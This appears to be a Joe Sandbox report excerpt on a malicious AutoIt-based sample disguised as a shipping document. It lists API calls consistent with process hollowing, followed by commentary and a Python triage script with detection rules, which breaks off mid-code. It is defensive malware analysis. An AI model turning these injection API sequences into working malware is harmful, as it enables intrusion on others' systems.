                      • Part of subcall function 00E03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                      • Part of subcall function 00E03041: InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                      • Part of subcall function 00E03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                      • Part of subcall function 00E03041: LoadIconW.USER32(000000A9), ref: 00E030F2
                      • Part of subcall function 00E03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: 114d3048383c00c8d65d92987d6b69b2e08a0b7a1fa04f1b4fe4207d7085ffa5
                    • Instruction ID: e37de65b58f8abdfbec1ceda08f8ef19de38e98558dd7ca8fa4daf40fcb9174f
                    • Opcode Fuzzy Hash: 114d3048383c00c8d65d92987d6b69b2e08a0b7a1fa04f1b4fe4207d7085ffa5
                    • Instruction Fuzzy Hash: D621F772910304AFEB14DFA6EC09B9D7BF4EB08711F10412AF504B62B1D7B666998F94

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                    • API String ID: 1825951767-347772802
                    • Opcode ID: 5da5bbc4c0d03c0aae8705f36eb3621681fe92e52e1b450d2cca7d61ba23266e
                    • Instruction ID: d4ff06f3abe81c29fc3cd7deee08561bd5805e64b6ba0a294f44f1cf1360ac8b
                    • Opcode Fuzzy Hash: 5da5bbc4c0d03c0aae8705f36eb3621681fe92e52e1b450d2cca7d61ba23266e
                    • Instruction Fuzzy Hash: DBA171729102199ACB14EFA0DC91EEEB7FCBF14300F54252AF416B71D2DB756A89CB60

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20313
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2031B
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E20326
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E20331
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E20339
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E20341
                      • Part of subcall function 00E16259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E0FA90), ref: 00E162B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E0FB2D
                    • OleInitialize.OLE32(00000000), ref: 00E0FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00E44921
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: <W$\T$%$S
                    • API String ID: 1986988660-191198415
                    • Opcode ID: b8d73c6a978317d2cbaa6a23d20abb6c6787e0452beb8eae8c23e4c510884234
                    • Instruction ID: 0c6b7030e722212ce3f861013d703c784ae484e68d147eeef8cc3450d5c056b9
                    • Opcode Fuzzy Hash: b8d73c6a978317d2cbaa6a23d20abb6c6787e0452beb8eae8c23e4c510884234
                    • Instruction Fuzzy Hash: 4C81B2B2901B40CFC388DF2AA945E597BE5BB98346350513ED42AF7261EB7264CBCF10

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FE9EA9
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FEA0CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: b99eabbc8180d1a70b190c2fbc03746a4e6f7802c4a3127daadb2e00a4c917d0
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: 7AA12871E04249EBDB14CFA5C888BEEB7B5FF48314F208559E211BB280D775AA40DF61

                    Control-flow Graph

                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00E03A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00E03A53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                    • Instruction ID: 0479a126abba4d8ffe7be4fd4c6a95d4f69d7c190c43a64db7690fc4e963f133
                    • Opcode Fuzzy Hash: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                    • Instruction Fuzzy Hash: 01F0DA725416907EEB355727AC49E6B2EBDD7C6F50B00413EF908B2170C6762896DAB0

                    Control-flow graph (rendered image not reproduced): function 00FE9B98-00FE9D94; calls 00FE77E8, 00FE9A88, CreateFileW, VirtualAlloc, ReadFile, 00FE9AC8, 00FE8A88, 00FE9B18, ExitProcess.
                    APIs
                      • Part of subcall function 00FE9A88: Sleep.KERNELBASE(000001F4), ref: 00FE9A99
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FE9CCE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: YWF3ZQY1TECX8A2F1HBNKNWLM4WE
                    • API String ID: 2694422964-963838094
                    • Opcode ID: bae94e84dd0134068d9d1811cde04637b07c985f1008a71cd7c4dabf876a5175
                    • Instruction ID: 8d8ff7ac05d6da57ce77240d807c6f3cf9ee3a37e11fd8527fc5919991642db2
                    • Opcode Fuzzy Hash: bae94e84dd0134068d9d1811cde04637b07c985f1008a71cd7c4dabf876a5175
                    • Instruction Fuzzy Hash: 93519431D08288DAEF11D7F8C848BDEBBB4AF55304F144199E6487B2C1C6B90B49CBB5

                    Control-flow graph (rendered image not reproduced): function 00E0410D-00E0420E with out-of-line blocks at 00E3D50D-00E3D563; calls 00E07B76, 00E07D2C, LoadStringW, 00E07C8E, 00E07143, 00E07E0B, 00E22F60, 00E0463E, 00E22F3C, Shell_NotifyIconW, 00E05A64, 00E081A7.
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E3D51C
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • _memset.LIBCMT ref: 00E0418D
                    • _wcscpy.LIBCMT ref: 00E041E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E041F1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 4d791857d947747e7c5ce71b7f892696f3e17b989ef187b48dbd7acb5fe2e191
                    • Instruction ID: 7829cefa5364eb630fff276cd867fbab96edb46b78270e0e46e57df9e190b5a5
                    • Opcode Fuzzy Hash: 4d791857d947747e7c5ce71b7f892696f3e17b989ef187b48dbd7acb5fe2e191
                    • Instruction Fuzzy Hash: C131CFB2409304AED325EBA0DD45FDB77E8AF44304F10552EF294B20E1EB70A6C9CB92
                    APIs
                      • Part of subcall function 00E04F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04F6F
                    • _free.LIBCMT ref: 00E3E5BC
                    • _free.LIBCMT ref: 00E3E603
                      • Part of subcall function 00E06BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06D0D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 4785df7550e8644df5ef5da6e9d47c1746714b6bc50b5b1cf075ad732ab1563e
                    • Instruction ID: 4c09cbf8f64d422bd37f475d0c106d1cb61ff32ba60bee020a55168bb2a729c9
                    • Opcode Fuzzy Hash: 4785df7550e8644df5ef5da6e9d47c1746714b6bc50b5b1cf075ad732ab1563e
                    • Instruction Fuzzy Hash: 2C915C71A10219AFCF14EFA4D8959EDBBB4FF08314F14646AF815BB2E1EB30A945CB50
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E035A1,SwapMouseButtons,00000004,?), ref: 00E035D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E035F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E03617
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                    • Instruction ID: c9434271407363e0fde87fcafb8e679271f678304c5e6708ed28de990b04d98d
                    • Opcode Fuzzy Hash: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                    • Instruction Fuzzy Hash: 4F114871510208BFDB20CF65EC409EEB7BCEF14744F1054A9E809E7250D6729E849760
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00FE9243
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FE92D9
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FE92FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                    • Instruction ID: 17fd1bf61a3db9caefa27467636a3ce6adb9c2d92cc4ec412b002b5b5e39edea
                    • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                    • Instruction Fuzzy Hash: 9A620C70A14258DBEB24CFA5C841BDEB376EF58300F1091A9D10DEB390E7B99E81DB59
                    APIs
                      • Part of subcall function 00E05045: _fseek.LIBCMT ref: 00E0505D
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698CD
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698E0
                    • _free.LIBCMT ref: 00E6974B
                    • _free.LIBCMT ref: 00E69752
                    • _free.LIBCMT ref: 00E697BD
                      • Part of subcall function 00E22ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29BA4), ref: 00E22EE9
                      • Part of subcall function 00E22ED5: GetLastError.KERNEL32(00000000,?,00E29BA4), ref: 00E22EFB
                    • _free.LIBCMT ref: 00E697C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: e04109606b965776ed5639af7f9fd1c9ba74d58510194298a21feaccf490b595
                    • Instruction ID: b730e79a7fc1356c3b47a232d1904d2796dc9c992e8891967c58a5f418883926
                    • Opcode Fuzzy Hash: e04109606b965776ed5639af7f9fd1c9ba74d58510194298a21feaccf490b595
                    • Instruction Fuzzy Hash: 4A5150B1904219AFDF249F64DC85A9EBBB9EF48304F10149EF609B7241DB715980CF58
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                    • Instruction ID: 9d09b5f1be10113f055edcba11b84d42133a96407578f6593ff1dfebf509b5eb
                    • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                    • Instruction Fuzzy Hash: 574106B070476A9BDB1CCF69E8809AF77E5AF84364B24953DF445E76C0D670DD808B40
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/$EA06
                    • API String ID: 4104443479-182974850
                    • Opcode ID: f6bf0030e55389ed46573c917291b7c960cfdaa2c40a3d168e0b5177e0d61c96
                    • Instruction ID: 482f4d7d696fcccc0f006783a90561857f4ce8d59d98d000058cdd473772b15c
                    • Opcode Fuzzy Hash: f6bf0030e55389ed46573c917291b7c960cfdaa2c40a3d168e0b5177e0d61c96
                    • Instruction Fuzzy Hash: A0415BE2A041585BCF218B64CA51BFF7FA5AB45304F287079EA46BF1C2C5219DC687A1
                    APIs
                    • _memset.LIBCMT ref: 00E3ED92
                    • GetOpenFileNameW.COMDLG32(?), ref: 00E3EDDC
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                      • Part of subcall function 00E20911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E20930
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: 8be484e8d685b2e5d9f42834b7de4819ec90995c0529d9f9e181eb9f3cd811b8
                    • Instruction ID: f916d36c178a09a4d53f565aefb4daa3258c9940e8e9d16f50cece4bbfca631f
                    • Opcode Fuzzy Hash: 8be484e8d685b2e5d9f42834b7de4819ec90995c0529d9f9e181eb9f3cd811b8
                    • Instruction Fuzzy Hash: 2421C371A042589BDB01DF94C845BEE7BFC9F88304F045059E408B7382DBB45989CFA1
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00E699A1
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E699B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                    • Instruction ID: a059de75ae4bb9bcac9f0b60529d6bbb394e36f6dcf4ce6d92c7bcbc7bd15350
                    • Opcode Fuzzy Hash: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                    • Instruction Fuzzy Hash: 85D05E7954030DAFDB509BA0DC0EFDA773CE704701F4002B1FB98E11A1EAB095988B91
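The entries above are the raw material of a triage pass: the function at 00FE9243 in the non-PE-backed FE7000 region calls CreateProcessW, then Wow64GetThreadContext and a 4-byte ReadProcessMemory, a sequence consistent with the start of process hollowing (the later write/set-context/resume calls are not listed in that entry, so the listing alone does not prove it); the AutoIt runtime entries show GetTempFileNameW with the "aut" prefix and string references such as "AU3!" and ">>>AUTOIT SCRIPT<<<". The script below is an added example, not part of the Joe Sandbox report or of its tooling: it parses the "APIs", "Source File", "String ID" and "Instruction Fuzzy Hash" bullets in the layout shown on this page, groups them per function, and applies a few rules of this example's own choosing. The rule sets (HOLLOW_PRELUDE, HOLLOW_TAIL, AUTOIT_MARKERS) and the "unbacked-code" interpretation of "based on PE: false" are assumptions of the example; the embedded SAMPLE is constructed from four entries on this page, abbreviated to the fields the parser uses.

```python
"""Triage helper for the 'APIs' listings in a Joe Sandbox report (added example, not report output)."""
import re
from dataclasses import dataclass, field

# One call line of an "APIs" listing. Three shapes occur in the report:
#   • CreateFileW.KERNELBASE(?,80000000,00000007,...), ref: 00FE9CCE
#   • _memset.LIBCMT ref: 00E0418D
#   • Part of subcall function 00FE9A88: Sleep.KERNELBASE(000001F4), ref: 00FE9A99
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Metadata bullets used by the rules ("API String ID" deliberately does not match).
META_RE = re.compile(r"^\s*•\s*(?P<key>Source File|String ID):\s*(?P<val>.*)$")


@dataclass
class Function:
    calls: list = field(default_factory=list)  # (api, module, args, ref, subcall_of)
    string_id: str = ""                        # "$"-joined strings the function references
    unbacked: bool = False                     # dump says "based on PE: false": no image on disk

    @property
    def apis(self):
        return {c[0] for c in self.calls}

    @property
    def first_ref(self):
        own = [c[3] for c in self.calls if c[4] is None] or [c[3] for c in self.calls]
        return own[0] if own else "n/a"


def parse_listing(text):
    """Split report text into per-function entries; each entry ends at its Instruction Fuzzy Hash."""
    funcs, cur = [], Function()
    for line in text.splitlines():
        if m := CALL_RE.match(line):
            cur.calls.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif m := META_RE.match(line):
            if m["key"] == "String ID":
                cur.string_id = m["val"].strip()
            else:
                cur.unbacked = "based on PE: false" in m["val"]
        elif "Instruction Fuzzy Hash" in line:
            funcs.append(cur)
            cur = Function()
    return funcs


# Rule sets are this example's assumptions; the API names are the ones the report prints.
HOLLOW_PRELUDE = {"CreateProcessW", "Wow64GetThreadContext", "ReadProcessMemory"}
HOLLOW_TAIL = {"WriteProcessMemory", "Wow64SetThreadContext", "SetThreadContext",
               "NtUnmapViewOfSection", "ResumeThread"}  # later stages, when a report lists them
AUTOIT_MARKERS = ("AU3!", ">>>AUTOIT SCRIPT<<<", ">>>AUTOIT NO CMDEXECUTE<<<", "AutoIt v3")


def triage(funcs):
    """Return (ref, rule, detail) tuples. Each hit is a lead for manual review, not a verdict."""
    findings = []
    for f in funcs:
        apis = f.apis
        if HOLLOW_PRELUDE <= apis:
            stage = "create process, read thread context, read remote memory"
            if apis & HOLLOW_TAIL:
                stage += "; write/set-context/resume tail also present"
            findings.append((f.first_ref, "process-injection", stage))
        if f.unbacked and apis:
            findings.append((f.first_ref, "unbacked-code",
                             "calls from memory not backed by a PE: " + ", ".join(sorted(apis))))
        if any(mk in f.string_id for mk in AUTOIT_MARKERS):
            findings.append((f.first_ref, "autoit-marker", f.string_id))
        for api, _mod, args, ref, _sub in f.calls:
            # GetTempFileNameW(path, "aut", 0, buf): the prefix the AutoIt runtime uses for temp files
            if api == "GetTempFileNameW" and "aut" in args.split(","):
                findings.append((ref, "autoit-temp-file", args))
    return findings


# Constructed input: four entries copied in the report's layout, abbreviated to the fields used.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00FE9243
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FE92D9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FE92FB
• Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
• String ID:
• Instruction Fuzzy Hash: 9A620C70A14258DBEB24CFA5C841BDEB376EF58300F1091A9D10DEB390E7B99E81DB59
APIs
  • Part of subcall function 00FE9A88: Sleep.KERNELBASE(000001F4), ref: 00FE9A99
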